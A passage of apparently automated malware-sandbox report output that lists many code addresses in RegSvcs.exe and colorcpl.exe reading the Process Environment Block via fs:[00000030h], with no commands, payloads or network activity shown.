          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01240EA5 mov eax, dword ptr fs:[00000030h]3_2_01240EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01240EA5 mov eax, dword ptr fs:[00000030h]3_2_01240EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01240EA5 mov eax, dword ptr fs:[00000030h]3_2_01240EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0120FE87 mov eax, dword ptr fs:[00000030h]3_2_0120FE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011F46A7 mov eax, dword ptr fs:[00000030h]3_2_011F46A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A36CC mov eax, dword ptr fs:[00000030h]3_2_011A36CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011B8EC7 mov eax, dword ptr fs:[00000030h]3_2_011B8EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0122FEC0 mov eax, dword ptr fs:[00000030h]3_2_0122FEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01248ED6 mov eax, dword ptr fs:[00000030h]3_2_01248ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011A16E0 mov ecx, dword ptr fs:[00000030h]3_2_011A16E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011876E2 mov eax, dword ptr fs:[00000030h]3_2_011876E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04701074 mov eax, dword ptr fs:[00000030h]14_2_04701074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465746D mov eax, dword ptr fs:[00000030h]14_2_0465746D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F2073 mov eax, dword ptr fs:[00000030h]14_2_046F2073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466A44B mov eax, dword ptr fs:[00000030h]14_2_0466A44B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04650050 mov eax, dword ptr fs:[00000030h]14_2_04650050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04650050 mov eax, dword ptr fs:[00000030h]14_2_04650050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CC450 mov eax, dword ptr fs:[00000030h]14_2_046CC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CC450 mov eax, dword ptr fs:[00000030h]14_2_046CC450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466BC2C mov eax, dword ptr fs:[00000030h]14_2_0466BC2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466002D mov eax, dword ptr fs:[00000030h]14_2_0466002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464B02A mov eax, dword ptr fs:[00000030h]14_2_0464B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464B02A mov eax, dword ptr fs:[00000030h]14_2_0464B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464B02A mov eax, dword ptr fs:[00000030h]14_2_0464B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464B02A mov eax, dword ptr fs:[00000030h]14_2_0464B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B6C0A mov eax, dword ptr fs:[00000030h]14_2_046B6C0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04704015 mov eax, dword ptr fs:[00000030h]14_2_04704015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04704015 mov eax, dword ptr fs:[00000030h]14_2_04704015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F1C06 mov eax, dword ptr fs:[00000030h]14_2_046F1C06
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B7016 mov eax, dword ptr fs:[00000030h]14_2_046B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B7016 mov eax, dword ptr fs:[00000030h]14_2_046B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B7016 mov eax, dword ptr fs:[00000030h]14_2_046B7016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0470740D mov eax, dword ptr fs:[00000030h]14_2_0470740D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F14FB mov eax, dword ptr fs:[00000030h]14_2_046F14FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B6CF0 mov eax, dword ptr fs:[00000030h]14_2_046B6CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04708CD6 mov eax, dword ptr fs:[00000030h]14_2_04708CD6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CB8D0 mov eax, dword ptr fs:[00000030h]14_2_046CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CB8D0 mov ecx, dword ptr fs:[00000030h]14_2_046CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CB8D0 mov eax, dword ptr fs:[00000030h]14_2_046CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CB8D0 mov eax, dword ptr fs:[00000030h]14_2_046CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CB8D0 mov eax, dword ptr fs:[00000030h]14_2_046CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CB8D0 mov eax, dword ptr fs:[00000030h]14_2_046CB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046790AF mov eax, dword ptr fs:[00000030h]14_2_046790AF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466F0BF mov ecx, dword ptr fs:[00000030h]14_2_0466F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466F0BF mov eax, dword ptr fs:[00000030h]14_2_0466F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466F0BF mov eax, dword ptr fs:[00000030h]14_2_0466F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639080 mov eax, dword ptr fs:[00000030h]14_2_04639080
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B3884 mov eax, dword ptr fs:[00000030h]14_2_046B3884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B3884 mov eax, dword ptr fs:[00000030h]14_2_046B3884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464849B mov eax, dword ptr fs:[00000030h]14_2_0464849B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463C962 mov eax, dword ptr fs:[00000030h]14_2_0463C962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463B171 mov eax, dword ptr fs:[00000030h]14_2_0463B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463B171 mov eax, dword ptr fs:[00000030h]14_2_0463B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465C577 mov eax, dword ptr fs:[00000030h]14_2_0465C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465C577 mov eax, dword ptr fs:[00000030h]14_2_0465C577
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465B944 mov eax, dword ptr fs:[00000030h]14_2_0465B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465B944 mov eax, dword ptr fs:[00000030h]14_2_0465B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04673D43 mov eax, dword ptr fs:[00000030h]14_2_04673D43
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B3540 mov eax, dword ptr fs:[00000030h]14_2_046B3540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04657D50 mov eax, dword ptr fs:[00000030h]14_2_04657D50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04708D34 mov eax, dword ptr fs:[00000030h]14_2_04708D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04654120 mov eax, dword ptr fs:[00000030h]14_2_04654120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04654120 mov eax, dword ptr fs:[00000030h]14_2_04654120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04654120 mov eax, dword ptr fs:[00000030h]14_2_04654120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04654120 mov eax, dword ptr fs:[00000030h]14_2_04654120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04654120 mov ecx, dword ptr fs:[00000030h]14_2_04654120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04643D34 mov eax, dword ptr fs:[00000030h]14_2_04643D34
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463AD30 mov eax, dword ptr fs:[00000030h]14_2_0463AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466513A mov eax, dword ptr fs:[00000030h]14_2_0466513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466513A mov eax, dword ptr fs:[00000030h]14_2_0466513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046BA537 mov eax, dword ptr fs:[00000030h]14_2_046BA537
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04664D3B mov eax, dword ptr fs:[00000030h]14_2_04664D3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639100 mov eax, dword ptr fs:[00000030h]14_2_04639100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639100 mov eax, dword ptr fs:[00000030h]14_2_04639100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639100 mov eax, dword ptr fs:[00000030h]14_2_04639100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463B1E1 mov eax, dword ptr fs:[00000030h]14_2_0463B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463B1E1 mov eax, dword ptr fs:[00000030h]14_2_0463B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463B1E1 mov eax, dword ptr fs:[00000030h]14_2_0463B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046C41E8 mov eax, dword ptr fs:[00000030h]14_2_046C41E8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464D5E0 mov eax, dword ptr fs:[00000030h]14_2_0464D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464D5E0 mov eax, dword ptr fs:[00000030h]14_2_0464D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046E8DF1 mov eax, dword ptr fs:[00000030h]14_2_046E8DF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046661A0 mov eax, dword ptr fs:[00000030h]14_2_046661A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046661A0 mov eax, dword ptr fs:[00000030h]14_2_046661A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046635A1 mov eax, dword ptr fs:[00000030h]14_2_046635A1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B69A6 mov eax, dword ptr fs:[00000030h]14_2_046B69A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04661DB5 mov eax, dword ptr fs:[00000030h]14_2_04661DB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B51BE mov eax, dword ptr fs:[00000030h]14_2_046B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B51BE mov eax, dword ptr fs:[00000030h]14_2_046B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B51BE mov eax, dword ptr fs:[00000030h]14_2_046B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B51BE mov eax, dword ptr fs:[00000030h]14_2_046B51BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466A185 mov eax, dword ptr fs:[00000030h]14_2_0466A185
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465C182 mov eax, dword ptr fs:[00000030h]14_2_0465C182
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662581 mov eax, dword ptr fs:[00000030h]14_2_04662581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04632D8A mov eax, dword ptr fs:[00000030h]14_2_04632D8A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662990 mov eax, dword ptr fs:[00000030h]14_2_04662990
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466FD9B mov eax, dword ptr fs:[00000030h]14_2_0466FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466FD9B mov eax, dword ptr fs:[00000030h]14_2_0466FD9B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464766D mov eax, dword ptr fs:[00000030h]14_2_0464766D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046EB260 mov eax, dword ptr fs:[00000030h]14_2_046EB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046EB260 mov eax, dword ptr fs:[00000030h]14_2_046EB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04708A62 mov eax, dword ptr fs:[00000030h]14_2_04708A62
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465AE73 mov eax, dword ptr fs:[00000030h]14_2_0465AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0467927A mov eax, dword ptr fs:[00000030h]14_2_0467927A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639240 mov eax, dword ptr fs:[00000030h]14_2_04639240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639240 mov eax, dword ptr fs:[00000030h]14_2_04639240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639240 mov eax, dword ptr fs:[00000030h]14_2_04639240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04639240 mov eax, dword ptr fs:[00000030h]14_2_04639240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04647E41 mov eax, dword ptr fs:[00000030h]14_2_04647E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046C4257 mov eax, dword ptr fs:[00000030h]14_2_046C4257
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463E620 mov eax, dword ptr fs:[00000030h]14_2_0463E620
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046EFE3F mov eax, dword ptr fs:[00000030h]14_2_046EFE3F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463C600 mov eax, dword ptr fs:[00000030h]14_2_0463C600
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04668E00 mov eax, dword ptr fs:[00000030h]14_2_04668E00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04648A0A mov eax, dword ptr fs:[00000030h]14_2_04648A0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463AA16 mov eax, dword ptr fs:[00000030h]14_2_0463AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463AA16 mov eax, dword ptr fs:[00000030h]14_2_0463AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04653A1C mov eax, dword ptr fs:[00000030h]14_2_04653A1C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466A61C mov eax, dword ptr fs:[00000030h]14_2_0466A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466A61C mov eax, dword ptr fs:[00000030h]14_2_0466A61C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662AE4 mov eax, dword ptr fs:[00000030h]14_2_04662AE4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046616E0 mov ecx, dword ptr fs:[00000030h]14_2_046616E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046476E2 mov eax, dword ptr fs:[00000030h]14_2_046476E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04678EC7 mov eax, dword ptr fs:[00000030h]14_2_04678EC7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04708ED6 mov eax, dword ptr fs:[00000030h]14_2_04708ED6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046636CC mov eax, dword ptr fs:[00000030h]14_2_046636CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662ACB mov eax, dword ptr fs:[00000030h]14_2_04662ACB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046EFEC0 mov eax, dword ptr fs:[00000030h]14_2_046EFEC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046352A5 mov eax, dword ptr fs:[00000030h]14_2_046352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046352A5 mov eax, dword ptr fs:[00000030h]14_2_046352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046352A5 mov eax, dword ptr fs:[00000030h]14_2_046352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046352A5 mov eax, dword ptr fs:[00000030h]14_2_046352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046352A5 mov eax, dword ptr fs:[00000030h]14_2_046352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B46A7 mov eax, dword ptr fs:[00000030h]14_2_046B46A7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464AAB0 mov eax, dword ptr fs:[00000030h]14_2_0464AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464AAB0 mov eax, dword ptr fs:[00000030h]14_2_0464AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04700EA5 mov eax, dword ptr fs:[00000030h]14_2_04700EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466FAB0 mov eax, dword ptr fs:[00000030h]14_2_0466FAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CFE87 mov eax, dword ptr fs:[00000030h]14_2_046CFE87
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466D294 mov eax, dword ptr fs:[00000030h]14_2_0466D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466D294 mov eax, dword ptr fs:[00000030h]14_2_0466D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463DB60 mov ecx, dword ptr fs:[00000030h]14_2_0463DB60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464FF60 mov eax, dword ptr fs:[00000030h]14_2_0464FF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04708F6A mov eax, dword ptr fs:[00000030h]14_2_04708F6A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04663B7A mov eax, dword ptr fs:[00000030h]14_2_04663B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04663B7A mov eax, dword ptr fs:[00000030h]14_2_04663B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463DB40 mov eax, dword ptr fs:[00000030h]14_2_0463DB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0464EF40 mov eax, dword ptr fs:[00000030h]14_2_0464EF40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04708B58 mov eax, dword ptr fs:[00000030h]14_2_04708B58
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0463F358 mov eax, dword ptr fs:[00000030h]14_2_0463F358
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04634F2E mov eax, dword ptr fs:[00000030h]14_2_04634F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04634F2E mov eax, dword ptr fs:[00000030h]14_2_04634F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466E730 mov eax, dword ptr fs:[00000030h]14_2_0466E730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466A70E mov eax, dword ptr fs:[00000030h]14_2_0466A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466A70E mov eax, dword ptr fs:[00000030h]14_2_0466A70E
